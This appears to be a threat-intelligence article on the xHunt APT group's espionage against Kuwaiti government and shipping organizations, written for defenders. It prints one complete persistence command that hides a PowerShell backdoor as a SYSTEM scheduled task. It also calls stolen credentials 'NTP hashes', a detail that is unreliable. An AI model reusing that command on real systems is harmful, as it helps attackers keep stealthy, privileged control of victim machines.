The sophisticated xHunt APT group has launched a series of targeted cyberattacks against organizations in Kuwait, specifically focusing on government, shipping, and transportation sectors. This advanced persistent threat actor, active since 2018, is employing a custom and evolving toolkit, with many of its tools named after characters from the popular anime series “Hunter x Hunter.” The group’s primary objective appears to be cyber-espionage, aiming to infiltrate critical infrastructure and extract sensitive intelligence.
Recent analysis by security researchers has uncovered the methods employed by xHunt, including a novel watering hole attack technique. This strategy involves injecting hidden HTML tags into compromised government websites. These tags invisibly redirect unsuspecting visitors to servers controlled by the attackers, where they are prompted to download malicious files or have their Network Time Protocol (NTP) hashes harvested. This passive credential theft allows xHunt to gain unauthorized access and move laterally within victim networks with a low initial detection signature.
xHunt’s Sophisticated Attack Vectors and Custom Backdoors
Beyond watering hole attacks, xHunt is actively exploiting vulnerabilities in publicly facing Microsoft Exchange and Internet Information Services (IIS) web servers. These compromises serve as initial entry points for deploying a range of custom malware. The group’s arsenal includes bespoke backdoors such as “Hisoka” and “Netero,” as well as the “BumbleBee” webshell. These tools enable the attackers to execute arbitrary commands remotely, maintaining a persistent presence within compromised systems.
A particularly noteworthy aspect of xHunt’s operations is their utilization of Exchange Web Services (EWS) for command and control (C2) communication. According to reports, the attackers manage to blend their C2 traffic into legitimate email workflows by utilizing email drafts stored within the Deleted Items folder. This technique is highly effective in evading detection by traditional security monitoring solutions that typically focus on network traffic anomalies.
The ongoing threat posed by the xHunt APT necessitates a proactive approach to cybersecurity. Their ability to adapt and employ custom, stealthy techniques makes them a formidable adversary for organizations, particularly those within the critical infrastructure sectors of Kuwait and potentially neighboring regions.
Persistence and Defense Evasion Mechanisms Employed by xHunt
A core component of xHunt’s operational strategy is its meticulous focus on maintaining persistence within compromised networks. The group relies heavily on the creation of scheduled tasks to ensure their custom PowerShell-based backdoors, such as “TriFive” and “Snugy,” remain active even after a system reboot. These tasks are configured to execute malicious scripts at regular intervals, often every few minutes, providing a consistent foothold for the attackers.
To further enhance their stealth, xHunt employs sophisticated defense evasion tactics. This includes masquerading their malicious files and scheduled tasks to appear as legitimate Windows processes or system components. For example, they have been observed placing payloads in trusted directories and naming scheduled tasks to mimic authorized system utilities. This makes it challenging for security analysts to distinguish between benign and malicious activities within network logs.
One example of their persistence mechanism involves a command like:
schtasks /create /sc MINUTE /mo 5 /tn "MicrosoftWindowsSideShowSystemDataProvider" /tr "powershell -exec bypass -file C:WindowsTempxpsrchvw.ps1" /ru SYSTEMThis command establishes a scheduled task disguised as a legitimate Windows system data provider, granting it SYSTEM privileges for executing the backdoor payload. Additionally, the group utilizes SSH tunnels for lateral movement, allowing them to navigate through the compromised network and access additional sensitive data or systems undetected.
The ongoing analysis of the xHunt APT‘s activities suggests a continued focus on intelligence gathering and cyber-espionage. Organizations in Kuwait, particularly those in the government and critical infrastructure sectors, should prioritize reviewing their security postures, implementing robust endpoint detection and response (EDR) solutions, and conducting regular security awareness training for their employees. The evolving nature of the group’s tactics underscores the importance of continuous threat intelligence monitoring and adaptive defense strategies to counter such advanced persistent threats.